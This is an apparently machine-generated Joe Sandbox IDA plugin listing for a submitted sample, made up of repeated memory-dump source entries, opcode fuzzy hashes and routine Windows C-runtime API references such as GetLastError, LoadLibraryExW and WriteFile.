                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: fedbaff18f8ff3be7eb12db09e62ba8ae1ddbb6fc60e3bdc30a8b8740d529edc
                                                                                                                  • Instruction ID: 9fde8fe4765b691de3f7480fb4ae948adc3b830f939116c0148592ad12856904
                                                                                                                  • Opcode Fuzzy Hash: fedbaff18f8ff3be7eb12db09e62ba8ae1ddbb6fc60e3bdc30a8b8740d529edc
                                                                                                                  • Instruction Fuzzy Hash: CCB1BF70A04349EFDF11DFA8C881BAE7FB1EF46310F184258E955A7292C7709942CBB4
                                                                                                                  APIs
                                                                                                                  • GetLastError.KERNEL32(?,?,00D96109,00D8C977,00D8B7A5), ref: 00D96120
                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D9612E
                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D96147
                                                                                                                  • SetLastError.KERNEL32(00000000,00D96109,00D8C977,00D8B7A5), ref: 00D96199
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3852720340-0
                                                                                                                  • Opcode ID: 0035f18ff522f1af74ec2c0e672364ff2e7a63bac5002f2bf9c2899e9507d548
                                                                                                                  • Instruction ID: 16bc964f738a95ecc7bb5bb947a7a3ceec3d2c6342a0ab1991cfdfcf6ed449d1
                                                                                                                  • Opcode Fuzzy Hash: 0035f18ff522f1af74ec2c0e672364ff2e7a63bac5002f2bf9c2899e9507d548
                                                                                                                  • Instruction Fuzzy Hash: 8E01F737259711DEAF352BB47C859672AA5EB263B5724032AF525B12F2FF118C0193B0
                                                                                                                  APIs
                                                                                                                  • type_info::operator==.LIBVCRUNTIME ref: 00D96AF9
                                                                                                                  • CallUnexpected.LIBVCRUNTIME ref: 00D96D72
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CallUnexpectedtype_info::operator==
                                                                                                                  • String ID: csm$csm$csm
                                                                                                                  • API String ID: 2673424686-393685449
                                                                                                                  • Opcode ID: a8919f4f340507b368960ee5ad4040ebd8ba3d60bf2070109aa8fcce5536c032
                                                                                                                  • Instruction ID: f956a5fab7dc8a88a64835b240b149a3b43fff6b8648a60a86929b176905b27c
                                                                                                                  • Opcode Fuzzy Hash: a8919f4f340507b368960ee5ad4040ebd8ba3d60bf2070109aa8fcce5536c032
                                                                                                                  • Instruction Fuzzy Hash: A8B158B1900209EFCF29DFA4C9819AEBBB5FF14314F18415AF815AB212D731EA51CBB1
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClassHandleMessageModuleRegister
                                                                                                                  • String ID: ($Melon
                                                                                                                  • API String ID: 1585107554-1480228127
                                                                                                                  • Opcode ID: c4e82eb5e8d92fd385369b593bbcda31f89ac022814f77823c5117a7f2b60929
                                                                                                                  • Instruction ID: 5d2e06aff7418538b31cabcf21c2b7033203aba761094ced71b8820f7877d8c0
                                                                                                                  • Opcode Fuzzy Hash: c4e82eb5e8d92fd385369b593bbcda31f89ac022814f77823c5117a7f2b60929
                                                                                                                  • Instruction Fuzzy Hash: 5021B6B0905308DFDB44EFA8E58979EBBF0FB48300F50892AE44AD7354E77499489F66
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,6FF93721,?,?,00000000,00DA7345,000000FF,?,00D9145E,00000002,?,00D914FA,00D9415D), ref: 00D913D2
                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D913E4
                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,00DA7345,000000FF,?,00D9145E,00000002,?,00D914FA,00D9415D), ref: 00D91406
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                  • Opcode ID: 0a094d671be87879b81e197280ddcf4fc8ec8b8b0401ae4f45415b3cc1bf3884
                                                                                                                  • Instruction ID: d256b81d1e4b8afddf0bfd19b2d51447c9fc1503f627552f2d7acdb6e67df790
                                                                                                                  • Opcode Fuzzy Hash: 0a094d671be87879b81e197280ddcf4fc8ec8b8b0401ae4f45415b3cc1bf3884
                                                                                                                  • Instruction Fuzzy Hash: D0016735A4461AEFDF159F54CC09FAFBBB8FB44B11F044629E821E2790DB749900CA60
                                                                                                                  APIs
                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00D98BBB
                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00D98C84
                                                                                                                  • __freea.LIBCMT ref: 00D98CEB
                                                                                                                    • Part of subcall function 00D97381: RtlAllocateHeap.NTDLL(00000000,00D9935A,?,?,00D9935A,00000220,?,00000000,?), ref: 00D973B3
                                                                                                                  • __freea.LIBCMT ref: 00D98CFE
                                                                                                                  • __freea.LIBCMT ref: 00D98D0B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1423051803-0
                                                                                                                  • Opcode ID: 6ba31a73fd6b6a4d786bce99f6ee9a709d4c126892910de0b32e51c4e4327756
                                                                                                                  • Instruction ID: 054fac9b009c71e15bc6ef15feee8a238d2110df2e5fdbb6940fb179d5576821
                                                                                                                  • Opcode Fuzzy Hash: 6ba31a73fd6b6a4d786bce99f6ee9a709d4c126892910de0b32e51c4e4327756
                                                                                                                  • Instruction Fuzzy Hash: 3351BFB2601246AFEF216F65CC81EBB7AA9EF96B10F190129FD05E6151EF30DD10A770
                                                                                                                  APIs
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00D8BB1B
                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(?,?,00000000,00DA7328,000000FF,?,00D8892E), ref: 00D8BB3A
                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00DA7328,000000FF,?,00D8892E), ref: 00D8BB68
                                                                                                                  • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00DA7328,000000FF,?,00D8892E), ref: 00D8BBC3
                                                                                                                  • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00DA7328,000000FF,?,00D8892E), ref: 00D8BBDA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 66001078-0
                                                                                                                  • Opcode ID: b0f6e2e8615d278ba95768059799c82340b5b9268ae159d8881024fef947fda3
                                                                                                                  • Instruction ID: 4a2b629674e56c22525ee5005967baaa2467f76b1821862f02a7dc57c9a7283e
                                                                                                                  • Opcode Fuzzy Hash: b0f6e2e8615d278ba95768059799c82340b5b9268ae159d8881024fef947fda3
                                                                                                                  • Instruction Fuzzy Hash: 3341277590060ADFCB20EF65C4909AAB3F4FF08360B584A6BE496D7654DB30F985CB71
                                                                                                                  APIs
                                                                                                                  • __EH_prolog3.LIBCMT ref: 00D894C6
                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00D894D1
                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00D8953F
                                                                                                                    • Part of subcall function 00D893C8: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00D893E0
                                                                                                                  • std::locale::_Setgloballocale.LIBCPMT ref: 00D894EC
                                                                                                                  • _Yarn.LIBCPMT ref: 00D89502
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1088826258-0
                                                                                                                  • Opcode ID: fe085558b9bbbcac418db3ff29aa5df3de177dd4d3c7933e5f348f865aaa2295
                                                                                                                  • Instruction ID: 36927654b3212abf823048b1a7bafe2152779ea13c336f6bb57befb803698d3c
                                                                                                                  • Opcode Fuzzy Hash: fe085558b9bbbcac418db3ff29aa5df3de177dd4d3c7933e5f348f865aaa2295
                                                                                                                  • Instruction Fuzzy Hash: 0A01BC75A00211EBC706FB20D86957DBBA1FF85320B184149E84197381DF34AA42CBB1
                                                                                                                  APIs
                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00DA1C4D,00000000,?,00DB40C8,?,?,?,00DA1B84,00000004,InitializeCriticalSectionEx,00DAB2A4,00DAB2AC), ref: 00DA1BBE
                                                                                                                  • GetLastError.KERNEL32(?,00DA1C4D,00000000,?,00DB40C8,?,?,?,00DA1B84,00000004,InitializeCriticalSectionEx,00DAB2A4,00DAB2AC,00000000,?,00D9702C), ref: 00DA1BC8
                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00DA1BF0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                  • String ID: api-ms-
                                                                                                                  • API String ID: 3177248105-2084034818
                                                                                                                  • Opcode ID: f716b28ee99058d48d0ac170e28c1b21b20cdfd17ff09214755a2402ca0f6f8d
                                                                                                                  • Instruction ID: f9bba14c2eb3cfcfd0144484d5e21db8f5e8298557f979501139dbe6055c02c1
                                                                                                                  • Opcode Fuzzy Hash: f716b28ee99058d48d0ac170e28c1b21b20cdfd17ff09214755a2402ca0f6f8d
                                                                                                                  • Instruction Fuzzy Hash: 54E04F30685309FBFF102B61EC06F5E3F58AB12B91F184021F90DE81E2EB61D9509AB4
                                                                                                                  APIs
                                                                                                                  • GetConsoleOutputCP.KERNEL32(6FF93721,00000000,00000000,?), ref: 00D9F36C
                                                                                                                    • Part of subcall function 00D97491: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D98CE1,?,00000000,-00000008), ref: 00D974F2
                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00D9F5BE
                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00D9F604
                                                                                                                  • GetLastError.KERNEL32 ref: 00D9F6A7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2112829910-0
                                                                                                                  • Opcode ID: 2430fe011c87ec494ef5189b2e9f6af25b368d220f8379b483ba8392ae5b35f9
                                                                                                                  • Instruction ID: 269be6e52615b882b0cc585c6779064c4fca898b6571cebe82f407c471ac4a71
                                                                                                                  • Opcode Fuzzy Hash: 2430fe011c87ec494ef5189b2e9f6af25b368d220f8379b483ba8392ae5b35f9
                                                                                                                  • Instruction Fuzzy Hash: 2BD14975D00258EFCF15CFA8D8809AEBBB5FF49314F28456AE865EB352D630E941CB60
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AdjustPointer
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1740715915-0
                                                                                                                  • Opcode ID: d7161956f45c868e245dc8ff9af32c55e5cfae7badbcae5de9f2e16177fede26
                                                                                                                  • Instruction ID: e59d74052eaf4aeb701b44971657424896e7ff8f4fd31a6f9b6ad292b521f51e
                                                                                                                  • Opcode Fuzzy Hash: d7161956f45c868e245dc8ff9af32c55e5cfae7badbcae5de9f2e16177fede26
                                                                                                                  • Instruction Fuzzy Hash: 4051BF76A00206EFEF299F91D851BBAB7A4EF04B14F18452DE845876D1E731EC80CBB0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D97491: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D98CE1,?,00000000,-00000008), ref: 00D974F2
                                                                                                                  • GetLastError.KERNEL32 ref: 00D9D199
                                                                                                                  • __dosmaperr.LIBCMT ref: 00D9D1A0
                                                                                                                  • GetLastError.KERNEL32 ref: 00D9D1DA
                                                                                                                  • __dosmaperr.LIBCMT ref: 00D9D1E1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1913693674-0
                                                                                                                  • Opcode ID: 9db0cbfbcfc67c14e3e9e1fff62858739a9bb555dbe1954dc0cb2f1ccbb05fe8
                                                                                                                  • Instruction ID: d1a7083fa3184a81d9d215e3fbb70d616e0f750529b803e911f2b4275ebaa60e
                                                                                                                  • Opcode Fuzzy Hash: 9db0cbfbcfc67c14e3e9e1fff62858739a9bb555dbe1954dc0cb2f1ccbb05fe8
                                                                                                                  • Instruction Fuzzy Hash: 6B219F72700305AFDF21AF6A8C8096BB7AAFF443A47148519F959A7251DB30ED40CBB0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2f03722bcd29c363325375607f4c523eb37c423c6a4b81c297f7b19d6d9520b2
                                                                                                                  • Instruction ID: 3ba9842fda5c4324ca8e6db3d3e04f64bba3ea26611249405f069a5415012712
                                                                                                                  • Opcode Fuzzy Hash: 2f03722bcd29c363325375607f4c523eb37c423c6a4b81c297f7b19d6d9520b2
                                                                                                                  • Instruction Fuzzy Hash: 3321A931604215BF9B28FF658C8096BB7A9FF40B647198A25F85AD7251EB30ED019FB0
                                                                                                                  APIs
                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 00D9E533
                                                                                                                    • Part of subcall function 00D97491: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D98CE1,?,00000000,-00000008), ref: 00D974F2
                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D9E56B
                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D9E58B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
